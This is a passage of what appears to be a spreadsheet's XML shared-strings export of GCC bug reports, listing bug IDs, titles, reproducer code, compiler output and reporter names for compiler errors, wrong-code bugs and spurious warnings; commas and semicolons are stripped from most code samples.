    <t>Obsolescence warning for non-obs. feature character name*length</t>
  </si>
  <si>
    <t>Gfortran 4.6.2 -std=f95 says a declaration character name*length is obsolescent. IMHO it is not the obsolescent form is character*length name. Gfortran 4.4.4 is correct on this matter. See below.
rimu[~]$ cat obschar.f90
! Character*length is obsolescent not character name*length 
character greet*11
greet = 'Hello world'
print *greet
end
rimu[~]$ gfortran -v
Using built-in specs.
Target: i386-redhat-linux6E
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-bugurl=http://bugzilla.redhat.com/bugzilla --enable-bootstrap --enable-shared --enable-threads=posix --enable-checking=release --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --disable-gnu-unique-object --enable-languages=cc++fortran --disable-libgcj --with-mpfr=/builddir/build/BUILD/gcc-4.4.4-20100726/obj-i386-redhat-linux6E/mpfr-install/ --with-ppl=/builddir/build/BUILD/gcc-4.4.4-20100726/obj-i386-redhat-linux6E/ppl-install --with-cloog=/builddir/build/BUILD/gcc-4.4.4-20100726/obj-i386-redhat-linux6E/cloog-install --with-tune=generic --with-arch=i586 --build=i386-redhat-linux6E
Thread model: posix
gcc version 4.4.4 20100726 (Red Hat 4.4.4-13) (GCC) 
rimu[~]$ gfortran -std=f95 obschar.f90
rimu[~]$ ./a.out
 Hello world
rimu[~]$ /tmp/gf/bin/gfortran -v
Using built-in specs.
COLLECT_GCC=/tmp/gf/bin/gfortran
Target: i686-pc-linux-gnu
Configured with: /tmp/gcc-4.6.2/configure --prefix=/tmp/gf --enable-languages=cc++fortran --disable-libada --with-gmp=/home/harperj1 --with-mpfr-include=/home/harperj1/mpfr-3.0.0 --with-mpfr-lib=/home/harperj1/mpfr-3.0.0/.libs --with-mpc=/home/harperj1/mpc-0.9
Thread model: posix
gcc version 4.6.2 (GCC) 
rimu[~]$ /tmp/gf/bin/gfortran -std=f95 obschar.f90
obschar.f90:2.18:
character greet*11
                  1
Warning: Obsolescent feature: Old-style character length at (1)
rimu[~]$</t>
  </si>
  <si>
    <t>john.harper</t>
  </si>
  <si>
    <t>GCC-69697</t>
  </si>
  <si>
    <t>incorrect runtime initialization of static flexible array members</t>
  </si>
  <si>
    <t>Similar to bug 69696 G++ accepts the questionable program below but emits incorrect code overlaying the flexible array member over the variable j.  This can be seen in the generated assembly file (below).  The underlying problem is that G++ emits a .size directive that corresponds to the size of the type as opposed to the ultimate size of the object (or its largest initializer).  This was fixed in the C front end via bug 28865.
	.globl	i
	.bss
	.align 4
	.type	i @object
	.size	i 4
i:
	.zero	4
	.globl	a
	.align 4
	.type	a @object
	.size	a 4
a:
	.zero	4
	.globl	j
	.align 4
	.type	j @object
	.size	j 4
j:
	.zero	4
G++ should either reject such code with an error or it should lay down the global variables consecutively.
$ cat x.c &amp;&amp; /home/msebor/build/gcc-trunk-svn/gcc/xgcc -B/home/msebor/build/gcc-trunk-svn/gcc -Wall -Wextra -Wpedantic -std=c++14 -xc++ x.c &amp;&amp; ./a.out
int i
struct A { int n a[] } a = i ? A({ 1 { 2 } }) : A({ 2 { 3 4 } })
int j
int main ()
{
    __builtin_printf (i = %i j = %i a = { %i {  i j a.n)
    for (int i = 0 i != a.n ++i)
        __builtin_printf (%i  a.a[i])
    __builtin_printf (} }\n)
}
x.c:2:48: warning: initialization of a flexible array member [-Wpedantic]
 struct A { int n a[] } a = i ? A({ 1 { 2 } }) : A({ 2 { 3 4 } })
                                                ^
x.c:2:69: warning: initialization of a flexible array member [-Wpedantic]
 struct A { int n a[] } a = i ? A({ 1 { 2 } }) : A({ 2 { 3 4 } })
                                                                     ^
i = 0 j = 3 a = { 2 { 3 4 } }</t>
  </si>
  <si>
    <t>GCC-7109</t>
  </si>
  <si>
    <t>parse error when declare function pointer returning T in class T</t>
  </si>
  <si>
    <t>rdabrowa</t>
  </si>
  <si>
    <t>GCC-20760</t>
  </si>
  <si>
    <t>cast to variable-length array type combined with switch statement gives segv</t>
  </si>
  <si>
    <t>gcc -v:
Configured with: ../gcc-3.4.3/configure --prefix=/u/ki/eabaltz/usr/i386
Thread model: posix
gcc version 3.4.3
command line:
gcc -Wall --save-temps bug.c
this works:
./a.out 1
matrix[0][]:    1.0 -2.0 -3.0
matrix[1][]:    2.0  4.0 -6.0
matrix[2][]:    3.0  6.0  9.0
matrix[0][]:    1.0 -2.0 -3.0
matrix[1][]:    2.0  4.0 -6.0
matrix[2][]:    3.0  6.0  9.0
---
this doesn't:
./a.out 2
matrix[0][]:    1.0 -2.0 -3.0
matrix[1][]:    2.0  4.0 -6.0
matrix[2][]:    3.0  6.0  9.0
Segmentation fault (core dumped)</t>
  </si>
  <si>
    <t>eabaltz</t>
  </si>
  <si>
    <t>GCC-11473</t>
  </si>
  <si>
    <t>[3.3/3.4 Regression] ICE with -gstabs when empty struct inheits from an empty struct</t>
  </si>
  <si>
    <t>Including virtually any STL header and attempting to compile with -gstabs with
GCC 3.3 causes an ICE on x86/Linux. I'm using glibc 2.2.5 and binutils
2.11.93.0.2 though I doubt either is relevant here. Using other debug flags
like -gstabs+ -gdwarf -gdwarf-2 etc seems to work fine.
$ cat stabsbug.cpp 
#include 
int main() { return 0 }
$ g++-3.3 -gstabs stabsbug.cpp -c -o /dev/null 
In file included from /usr/local/gcc-3.3/include/c++/3.3/bits/stl_algobase.h:73
                 from /usr/local/gcc-3.3/include/c++/3.3/vector:67
                 from stabsbug.cpp:1:
/usr/local/gcc-3.3/include/c++/3.3/bits/stl_iterator_base_types.h:84: internal
compiler error: Segmentation
   fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
$ g++-3.3 -v
Reading specs from /usr/local/gcc-3.3/lib/gcc-lib/i686-pc-linux-gnu/3.3/specs
Configured with: ../gcc-3.3/configure --prefix=/usr/local/gcc-3.3 --enable-threads
Thread model: posix
gcc version 3.3</t>
  </si>
  <si>
    <t>GCC-4950</t>
  </si>
  <si>
    <t>[m68k] gcc-3.0.2 unsigned char *pb++ does double increment</t>
  </si>
  <si>
    <t>Compile the following C code with gcc-3.0.2 m68k-elf.
Use objdump to examine the .o file.
Release:
3.0.2
Environment:
System: SunOS farside 5.6 Generic_105181-25 sun4m sparc SUNWSPARCstation-20
Architecture: sun4
host: sparc-sun-solaris2.6
build: sparc-sun-solaris2.6
target: m68k-unknown-elf
configured with: ../gcc-3.0.2/configure --target=m68k-elf --with-newlib --prefix=/engwest/agt_tools/compilers/gcc/3.0.2-sol26-m68k-elf
How-To-Repeat:
############ screen output ##############
/engwest/agt_tools/compilers/gcc/3.0.2-sol26-m68k-elf/bin/m68k-elf-gcc -c -g -O -funsigned-char -fno-builtin -Wall -v -save-temps  \
 -m5200 -Wa-register-prefix-optional bug2.c
####### produced ################3
Reading specs from /engwest/agt_tools/compilers/gcc/3.0.2-sol26-m68k-elf/lib/gcc-lib/m68k-elf/3.0.2/specs
Configured with: ../gcc-3.0.2/configure --target=m68k-elf --with-newlib --prefix=/engwest/agt_tools/compilers/gcc/3.0.2-sol26-m68k-elf
Thread model: single
gcc version 3.0.2
 /engwest/agt_tools/compilers/gcc/3.0.2-sol26-m68k-elf/lib/gcc-lib/m68k-elf/3.0.2/cpp0 -lang-c -v -D__GNUC__=3 -D__GNUC_MINOR__=0 -D__GNUC_PATCHLEVEL__=2 -Dmc68000 -D__embedded__ -D__mc68000__ -D__embedded__ -D__mc68000 -Asystem=embedded -Amachine=mc68000 -D__CHAR_UNSIGNED__ -D__OPTIMIZE__ -D__STDC_HOSTED__=1 -Wall -Dmcf5200 -D__mcf5200__ -D__mcf5200 bug2.c bug2.i
GNU CPP version 3.0.2 (cpplib) (68k MIT syntax)
ignoring nonexistent directory /engwest/agt_tools/compilers/gcc/3.0.2-sol26-m68k-elf/m68k-elf/sys-include
#include ... search starts here:
#include  search starts here:
 /engwest/agt_tools/compilers/gcc/3.0.2-sol26-m68k-elf/lib/gcc-lib/m68k-elf/3.0.2/include
 /engwest/agt_tools/compilers/gcc/3.0.2-sol26-m68k-elf/m68k-elf/include
End of search list.
 /engwest/agt_tools/compilers/gcc/3.0.2-sol26-m68k-elf/lib/gcc-lib/m68k-elf/3.0.2/cc1 -fpreprocessed bug2.i -quiet -dumpbase bug2.c -m5200 -g -O -Wall -version -funsigned-char -fno-builtin -o bug2.s
GNU CPP version 3.0.2 (cpplib) (68k MIT syntax)
GNU C version 3.0.2 (m68k-elf)
        compiled by GNU C version 2.95.2 19991024 (release).
 /engwest/agt_tools/compilers/gcc/3.0.2-sol26-m68k-elf/lib/gcc-lib/m68k-elf/3.0.2/../../../../m68k-elf/bin/as -m5200 -register-prefix-optional -o bug2.o bug2.s
/* ############## the bad C code gcc-3.0.2 (2.95.3 works)################## */
unsigned int   er_F33BProgram(
                        unsigned int    d_AdrLo
                                 unsigned int    d_AdrHi
                                 void     *pv_Data
                                 )
{
   unsigned char     *pb_Data b_Data
   pb_Data = pv_Data
   do
   {
/*GNU3.0.2 with binutil2.11.2 produced moveb %a1@+%d2 2X! for pb_Data++ */
      b_Data = *pb_Data++ 
      *(volatile unsigned char*)d_AdrLo = b_Data
      d_AdrLo += sizeof( unsigned char )
   } while( d_AdrLo &lt; d_AdrHi )
   return   0
}
/* ################### the bug2.i file ########################## */
#if 0
# 1 bug2.c
unsigned int er_F33BProgram(
                        unsigned int d_AdrLo
                                 unsigned int d_AdrHi
                                 void *pv_Data
                                 )
{
   unsigned char *pb_Data b_Data
   pb_Data = pv_Data
   do
   {
      b_Data = *pb_Data++ 
      *(volatile unsigned char*)d_AdrLo = b_Data
      d_AdrLo += sizeof( unsigned char )
   } while( d_AdrLo &lt; d_AdrHi )
   return 0
}
#endif
/* #################### objdump of bug2.o ############################ */
#if 0
/* produced this */
bug2.o:     file format elf32-m68k
Disassembly of section .text:
00000000 :
   0: 4e56 0000       linkw %fp#0
   4: 2f02            movel %d2%sp@-
   6: 206e 0008       moveal %fp@(8)%a0
   a: 222e 000c       movel %fp@(12)%d1
   e: 226e 0010       moveal %fp@(16)%a1
  12: 1010            moveb %a0@%d0
/* ######### here is the bug: note BYTE *pb_Data++ produces 2X incs */
  14: 1419            moveb %a1@+%d2
  16: 1419            moveb %a1@+%d2
  18: c082            andl %d2%d0
/* gcc-2.95.3 optimized the next 2 instructions to:  10c0  moveb %d0%a0@+ */
  1a: 1080            moveb %d0%a0@
  1c: 5288            addql #1%a0
  1e: b288            cmpl %a0%d1
  20: 62f0            bhis 12 
  22: 4280            clrl %d0
  24: 241f            movel %sp@+%d2
  26: 4e5e            unlk %fp
  28: 4e75            rts
        ...
#endif</t>
  </si>
  <si>
    <t>daltrogg</t>
  </si>
  <si>
    <t>GCC-58377</t>
  </si>
  <si>
    <t>spurious may be used uninitialized warning with -Og</t>
  </si>
  <si>
    <t>The following code generates a spurious  â€˜outâ€™ may be used uninitialized in this function warning when built with -Og no optimization -O1 -O2 -O3 and -Ofast all do not warn.
// gcc -Og -std=c++0x -Wall -Werror -c xx.cpp
struct ordered_tasks
{
    int * pop ()
}
struct A
{
    ordered_tasks * tasks[]
    int * pop ()
}
int pop_first_bucket
int * A::pop ()
{
    int * out
    int cur_bucket = 0
    do {
        if (tasks[0]) {
            out = tasks[cur_bucket]-&gt;pop()
            if (out)
                return out
        }
    } while (pop_first_bucket)
    return 0
}
output / details of my system:
$ gcc -v -Og -std=c++0x -Wall -Werror -c xx.cpp
Using built-in specs.
COLLECT_GCC=/usr/bin/gcc
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Ubuntu/Linaro 4.8.1-10ubuntu1' --with-bugurl=file:///usr/share/doc/gcc-4.8/README.Bugs --enable-languages=cc++javagodfortranobjcobj-c++ --prefix=/usr --program-suffix=-4.8 --enable-shared --enable-linker-build-id --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.8 --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-gnu-unique-object --enable-plugin --with-system-zlib --disable-browser-plugin --enable-java-awt=gtk --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-4.8-amd64/jre --enable-java-home --with-jvm-root-dir=/usr/lib/jvm/java-1.5.0-gcj-4.8-amd64 --with-jvm-jar-dir=/usr/lib/jvm-exports/java-1.5.0-gcj-4.8-amd64 --with-arch-directory=amd64 --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --enable-objc-gc --enable-multiarch --disable-werror --with-arch-32=i686 --with-abi=m64 --with-multilib-list=m32m64mx32 --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.8.1 (Ubuntu/Linaro 4.8.1-10ubuntu1) 
COLLECT_GCC_OPTIONS='-v' '-Og' '-std=c++11' '-Wall' '-Werror' '-c' '-E' '-mtune=generic' '-march=x86-64'
 /usr/lib/gcc/x86_64-linux-gnu/4.8/cc1plus -E -quiet -v -imultiarch x86_64-linux-gnu -D_GNU_SOURCE xx.cpp -mtune=generic -march=x86-64 -std=c++11 -Wall -Werror -Og -fstack-protector -Wformat -Wformat-security
ignoring duplicate directory /usr/include/x86_64-linux-gnu/c++/4.8
ignoring nonexistent directory /usr/local/include/x86_64-linux-gnu
ignoring nonexistent directory /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../../x86_64-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/include/c++/4.8
 /usr/include/x86_64-linux-gnu/c++/4.8
 /usr/include/c++/4.8/backward
 /usr/lib/gcc/x86_64-linux-gnu/4.8/include
 /usr/local/include
 /usr/lib/gcc/x86_64-linux-gnu/4.8/include-fixed
 /usr/include/x86_64-linux-gnu
 /usr/include
End of search list.
COMPILER_PATH=/usr/lib/gcc/x86_64-linux-gnu/4.8/:/usr/lib/gcc/x86_64-linux-gnu/4.8/:/usr/lib/gcc/x86_64-linux-gnu/:/usr/lib/gcc/x86_64-linux-gnu/4.8/:/usr/lib/gcc/x86_64-linux-gnu/
LIBRARY_PATH=/usr/lib/gcc/x86_64-linux-gnu/4.8/:/usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/:/usr/lib/gcc/x86_64-linux-gnu/4.8/../../../../lib/:/lib/x86_64-linux-gnu/:/lib/../lib/:/usr/lib/x86_64-linux-gnu/:/usr/lib/../lib/:/usr/lib/gcc/x86_64-linux-gnu/4.8/../../../:/lib/:/usr/lib/
COLLECT_GCC_OPTIONS='-v' '-Og' '-std=c++11' '-Wall' '-Werror' '-c' '-E' '-mtune=generic' '-march=x86-64'
Using built-in specs.
COLLECT_GCC=/usr/bin/gcc
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Ubuntu/Linaro 4.8.1-10ubuntu1' --with-bugurl=file:///usr/share/doc/gcc-4.8/README.Bugs --enable-languages=cc++javagodfortranobjcobj-c++ --prefix=/usr --program-suffix=-4.8 --enable-shared --enable-linker-build-id --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.8 --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-gnu-unique-object --enable-plugin --with-system-zlib --disable-browser-plugin --enable-java-awt=gtk --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-4.8-amd64/jre --enable-java-home --with-jvm-root-dir=/usr/lib/jvm/java-1.5.0-gcj-4.8-amd64 --with-jvm-jar-dir=/usr/lib/jvm-exports/java-1.5.0-gcj-4.8-amd64 --with-arch-directory=amd64 --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --enable-objc-gc --enable-multiarch --disable-werror --with-arch-32=i686 --with-abi=m64 --with-multilib-list=m32m64mx32 --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.8.1 (Ubuntu/Linaro 4.8.1-10ubuntu1) 
COLLECT_GCC_OPTIONS='-v' '-Og' '-std=c++11' '-Wall' '-Werror' '-c' '-o' '/home/roland/.ccache/4/3/9782563fbf89cd86ac0377b998dd1c-3528.o.tmp.roland-t410s.18048' '-mtune=generic' '-march=x86-64'
 /usr/lib/gcc/x86_64-linux-gnu/4.8/cc1plus -fpreprocessed /home/roland/.ccache/tmp/xx.tmp.roland-t410s.18048.ii -quiet -dumpbase xx.tmp.roland-t410s.18048.ii -mtune=generic -march=x86-64 -auxbase-strip /home/roland/.ccache/4/3/9782563fbf89cd86ac0377b998dd1c-3528.o.tmp.roland-t410s.18048 -Og -Wall -Werror -std=c++11 -version -fstack-protector -Wformat -Wformat-security -o /tmp/ccZi8CJF.s
GNU C++ (Ubuntu/Linaro 4.8.1-10ubuntu1) version 4.8.1 (x86_64-linux-gnu)
	compiled by GNU C version 4.8.1 GMP version 5.1.2 MPFR version 3.1.1-p2 MPC version 1.0.1
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
GNU C++ (Ubuntu/Linaro 4.8.1-10ubuntu1) version 4.8.1 (x86_64-linux-gnu)
	compiled by GNU C version 4.8.1 GMP version 5.1.2 MPFR version 3.1.1-p2 MPC version 1.0.1
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: bbda97c7f6a737ad1364ffd9676a3180
xx.cpp: In member function â€˜int* A::pop()â€™:
xx.cpp:18:11: error: â€˜outâ€™ may be used uninitialized in this function [-Werror=maybe-uninitialized]
     int * out
           ^
cc1plus: all warnings being treated as errors</t>
  </si>
  <si>
    <t>rbd</t>
  </si>
  <si>
    <t>GCC-43771</t>
  </si>
  <si>
    <t>[4.5/4.6 Regression] ICE on valid when compiling ParMetis with gcc 4.5.0 and -O3</t>
  </si>
  <si>
    <t>The following inocent looking C function:
void KWayNodeRefine__(int nparts int *gpwgts int *badminpwgt int *badmaxpwgt)
{
   int i
   for (i=0 i&lt;nparts i+=2) {
       badminpwgt[i] = badminpwgt[i+1] = gpwgts[i]+gpwgts[i+1]
       badmaxpwgt[i] = badmaxpwgt[i+1] = gpwgts[i]+gpwgts[i+1]
   }
}
when compiled with gcc 4.5.0 generate an internal compiler error:
[audet@mc1 experiences]$ g++ -O3 -c nr.c
nr.c: In function 'void KWayNodeRefine__(int int* int* int*)':
nr.c:2:6: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
[audet@mc1 experiences]$
Note that there is no such error with -O2 or without options or when gcc 4.4.2 is used. Note also that the code above originate from ParMetis (parallel graph partitionner). I simplified it the most I could (and I think we cannot simplify it further to still triger the gcc ICE).
Now here are some information about my system:
[audet@mc1 experiences]$ gcc --version
gcc (GCC) 4.5.0
Copyright (C) 2010 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
[audet@mc1 experiences]$ gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/home/publique/gcc45/bin/../libexec/gcc/x86_64-unknown-linux-gnu/4.5.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-4.5.0/configure --prefix=/usr/local/gcc45 --enable-shared --enable-threads=posix --with-system-zlib --with-gmp=/usr/local/gmp-4.3.2 --with-mpfr=/usr/local/mpfr-2.4.2 --with-mpc=/usr/local/mpc-0.8.1 --with-ppl=/usr/local/ppl-0.10.2 --with-cloog=/usr/local/cloog-ppl-0.15.9 --with-libelf=/usr/local/libelf-0.8.12 --enable-__cxa_atexit --enable-languages=cc++fortran
Thread model: posix
gcc version 4.5.0 (GCC)
[audet@mc1 experiences]$ uname -a
Linux mc1 2.6.22.9-91.fc7 #1 SMP Thu Jun 18 16:01:22 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
[audet@mc1 experiences]$
As you can see my system uses Fedora Linux 7 distribution. gcc was compiled and tested (make -k check) this morning on this machine. Only a small fraction of the tests failled.
Regards</t>
  </si>
  <si>
    <t>martin.audet</t>
  </si>
  <si>
    <t>GCC-10866</t>
  </si>
  <si>
    <t>gcc -pthread does not define -D_REENTRANT</t>
  </si>
  <si>
    <t>gcc's documented -pthread option does not set the -D_REENTRANT pre-processor flag.
the link flag -lpthread is correctly set.
-pthread is supposed to be a front-end to any needed options / libraries needed in order to build a multi-thread program.  This includes pre-processing compilation &amp; link.
Bug reported to RedHat 
Release:
gcc-3.x for ia64
Environment:
Linux ia64. RedHat-7.2 RHAS-2.1 Debian Sarge
How-To-Repeat:
Steps to Reproduce:
1. get the attached program pthbug.c
2. compile it with gcc3 -v -pthread -Wall -Wstrict-prototypes pthbug.c
3. note that -D_REENTRANT is not defined</t>
  </si>
  <si>
    <t>francois-xavier.kowalski</t>
  </si>
  <si>
    <t>GCC-1351</t>
  </si>
  <si>
    <t>_Jv_select -vs- Thread.interrupt</t>
  </si>
  <si>
    <t>Currently _Jv_select does not throw an
InterruptedIOException if interrupted by Thread.interrupt.
We should first see if doing this makes sense from all
contexts where _Jv_select is called.
If so we can change it.
If not perhaps we should either
1. Add a comment explaining that _Jv_select should only
   be used without a timeout (maybe by removing the timeout
   parameter?) that is for instantaneous polling or
2. add an argument to _Jv_select indicating how to
   handle Thread.interrupt
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-55718</t>
  </si>
  <si>
    <t>[4.8 Regression] ICE in gen_reg_rtx at emit-rtl.c:866</t>
  </si>
  <si>
    <t>Created attachment 28981
preprocessed source
/usr/lib64/gcc/s390x-suse-linux/4.8/cc1 -fpreprocessed ansi.i -quiet -dumpbase ansi.c -march=z10 -mtune=z196 -m64 -mzarch -auxbase-strip ../obj_s/ansi.o -g -O2 -Wall -version -fmessage-length=0 -fstack-protector -funwind-tables -fasynchronous-unwind-tables -fPIC --param max-inline-insns-single=1200 -o ansi.s
GNU C (SUSE Linux) version 4.8.0 20121214 [trunk revision 194496] (s390x-suse-linux)
        compiled by GNU C version 4.8.0 20121214 [trunk revision 194496] GMP version 5.0.5 MPFR version 3.1.1 MPC version 1.0
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
GNU C (SUSE Linux) version 4.8.0 20121214 [trunk revision 194496] (s390x-suse-linux)
        compiled by GNU C version 4.8.0 20121214 [trunk revision 194496] GMP version 5.0.5 MPFR version 3.1.1 MPC version 1.0
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: 5b6417fa43f8bdfcc36ee141d0370571
../tack/ansi.c: In function 'terminal_state':
../tack/ansi.c:566:1: internal compiler error: in gen_reg_rtx at emit-rtl.c:866
 }
 ^
libbacktrace could not find executable to open
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-71112</t>
  </si>
  <si>
    <t>[6 Regression] ICE with -fpie on aarch64 ILP32 big-endian</t>
  </si>
  <si>
    <t>Take:
extern int dbs[100] 
void f(int *)
int nscd_init (void)
{
  f (dbs)
  return 0
}
--- CUT ----
This ICEs with -mabi=ilp32 -mbig-endian -fpie .
Here is the backtrace that is outputted:
0xae9515 crash_signal
        /data1/src/gcc-cavium/toolchain-6/scripts/../src/gcc/toplev.c:333
0x945968 mark_jump_label_1
        /data1/src/gcc-cavium/toolchain-6/scripts/../src/gcc/jump.c:1095
0x945cf9 mark_jump_label_1
        /data1/src/gcc-cavium/toolchain-6/scripts/../src/gcc/jump.c:1219
0x945cf9 mark_jump_label_1
        /data1/src/gcc-cavium/toolchain-6/scripts/../src/gcc/jump.c:1219
0x945cc0 mark_jump_label_1
        /data1/src/gcc-cavium/toolchain-6/scripts/../src/gcc/jump.c:1226
0x945cf9 mark_jump_label_1
        /data1/src/gcc-cavium/toolchain-6/scripts/../src/gcc/jump.c:1219
0x9461d3 mark_all_labels
        /data1/src/gcc-cavium/toolchain-6/scripts/../src/gcc/jump.c:340
0x9461d3 rebuild_jump_labels_1
        /data1/src/gcc-cavium/toolchain-6/scripts/../src/gcc/jump.c:75
Please submit a full bug report</t>
  </si>
  <si>
    <t>GCC-5307</t>
  </si>
  <si>
    <t>Infinite loop in cc1 on sparcv9-sun-solaris2.8 with -m64 short example</t>
  </si>
  <si>
    <t>cc1 seems to go into have an infinite loop on
sparcv9-sun-solaris2.8
for the following short program which is extracted from
my main application (so to me the bug is critical).
The compile line is
/pkgs/gcc-3.1v9/lib/gcc-lib/sparcv9-sun-solaris2.8/3.1/cc1 -m64 -fPIC -O1 -fschedule-insns2 -fno-strict-aliasing -fno-math-errno -mcpu=ultrasparc -mtune=ultrasparc -Wall -W -Wno-unused symkey.i
/* program starts */
extern long symkey_table(unsigned int subtype)
extern long hash_utf8string(char *str)
extern unsigned int ___utf8_get(char **ptr)
extern long find_symkey_from_utf8string(char *str unsigned int subtype)
{
    long h
    long probe
    h = hash_utf8string(str)
    if (h &lt; ((long) (0) &lt;&lt; 2))
        return h
    probe = (*((((long *) ((symkey_table(subtype)) - (1))) + 1) + ((h) &gt;&gt; 2) % 359))
    while (probe != (((long) -3 &lt;&lt; 2) + 2))
    {
        long name = (*((((long *) ((probe) - (1))) + 1) + 0))
        unsigned long i
        unsigned long n = ((((long) ((((unsigned long) ((*((long *) ((name) - (1))))) &gt;&gt; (3 + 5)) &gt;&gt; 1)) &gt; 2)
        char *p = str
        for (i = 0 i &lt; n i++)
            if (___utf8_get(&amp;p) !=
                ((unsigned int) ((((((long) (unsigned short) (*((unsigned short *) ((((long *) ((name) - (1))) + 1)) + ((((long) (i) &gt; 2))) &gt; 2))))
                goto next
        if (___utf8_get(&amp;p) == 0)
            return probe
next:
        probe = (*((((long *) ((probe) - (1))) + 1) + 2))
    }
    return (((long) -1 &lt;&lt; 2) + 2)
}
/* program ends */
Release:
unknown
Environment:
sparcv9-sun-solaris2.8
gcc version 3.1 20020102 (experimental)</t>
  </si>
  <si>
    <t>GCC-53008</t>
  </si>
  <si>
    <t>abort in _ITM_getTMCloneSafe</t>
  </si>
  <si>
    <t>Created attachment 27169
testcase for abort in _ITM_getTMCloneSafe
Abort in _ITM_getTMCloneSafe() within atomic transaction calling a function via a function pointer.  The abort only appears to happen if the function pointer is defined as __attribute__((transaction_safe)).  Only happens at -O2 and above.
Fairly minimal testcase attached.</t>
  </si>
  <si>
    <t>daveboutcher</t>
  </si>
  <si>
    <t>GCC-13047</t>
  </si>
  <si>
    <t>[3.4 regression] Failure of g77 tests auto0.f and auto1.f</t>
  </si>
  <si>
    <t>g77 tests auto0.f and auto1.f recently started to fail on cygwin.
CVS from approximately:
 - 2003-10-11 14:00 UTC passed
 - 2003-10-12 14:00 UTC fails 
FAIL: g77.f-torture/execute/auto0.f execution  -O3 -fomit-frame-pointer
FAIL: g77.f-torture/execute/auto0.f execution  -O3 -fomit-frame-pointer 
-funroll-loops 
FAIL: g77.f-torture/execute/auto0.f execution  -O3 -fomit-frame-pointer 
-funroll-all-loops -finline-functions 
FAIL: g77.f-torture/execute/auto0.f execution  -O3 -g 
FAIL: g77.f-torture/execute/auto1.f execution  -O3 -fomit-frame-pointer
FAIL: g77.f-torture/execute/auto1.f execution  -O3 -fomit-frame-pointer
-funroll-loops 
FAIL: g77.f-torture/execute/auto1.f execution  -O3 -fomit-frame-pointer
-funroll-all-loops -finline-functions 
FAIL: g77.f-torture/execute/auto1.f execution  -O3 -g 
No messages in g77.log.</t>
  </si>
  <si>
    <t>GCC-59599</t>
  </si>
  <si>
    <t>Compiler internal error on intrinsic ichar</t>
  </si>
  <si>
    <t>Created attachment 31513
Source code generatin the execption
When using the optional paramenter kind in the invocation of intrinsic function ichar the following exception is thrown:
m_util_convert.f90:767:0: internal compiler error: in gfc_trans_assignment_1 at fortran/trans-expr.c:8006
   res = ichar( cpk kind=1 )
 ^
Source file attached</t>
  </si>
  <si>
    <t>fmartinez</t>
  </si>
  <si>
    <t>GCC-80153</t>
  </si>
  <si>
    <t>ivopt generate wrong code</t>
  </si>
  <si>
    <t>Created attachment 41021
test.c
GCC configure: --target=riscv32-elf
What's happen:
IVOPT seen optimize induction variable into wrong thins and then make program became a infinite loop. 
How to reproduce:
riscv32-elf-gcc test.c -Os
Before ivopt (test.c.161t.cunroll):
main ()
{
  int c
  int i
  unsigned int ivtmp_1
  char _2
  const char * _4
  char _5
  int _6
  _Bool _7
  int _8
  unsigned int ivtmp_9
  unsigned int i.13_11
   [15.00%]:
  _fputs (oops!\n)
  goto  [100.00%]
   [85.00%]:
  _2 = _fgetc ()
  c_17 = (int) _2
  _4 = oops!\n + i.13_11
  _5 = *_4
  _6 = (int) _5
  _7 = _2 == _5
  _8 = (int) _7
  check (c_17 _6 _8)
  i_19 = i_12 + 1
   [100.00%]:
  # i_12 = PHI 
  # ivtmp_9 = PHI 
  i.13_11 = (unsigned int) i_12
  ivtmp_1 = ivtmp_9 - 1
  if (ivtmp_1 != 0)
    goto  [85.00%]
  else
    goto  [15.00%]
   [15.00%]:
  return 0
}
After ivopt (test.c.164t.ivopts):
main ()
{
...
   [85.00%]:
  _2 = _fgetc ()
  c_17 = (int) _2
  _24 = (void *) ivtmp.37_10
  _5 = MEM[base: _24 offset: 0B]
  _6 = (int) _5
  _7 = _2 == _5
  _8 = (int) _7
  check (c_17 _6 _8)
  ivtmp.37_3 = ivtmp.37_10 + 1
   [100.00%]:
  # ivtmp.37_10 = PHI 
  _21 = 6 - ivtmp.37_10
  _22 = oops!\n + _21    ***** IVOPT optimize i to to this
  _23 = (unsigned int) _22 ***** and just cast pointer to unsigned int
  if (_23 != 0)             ***** and compare to 0
    goto  [85.00%]
  else
    goto  [15.00%]
   [15.00%]:
  return 0
}
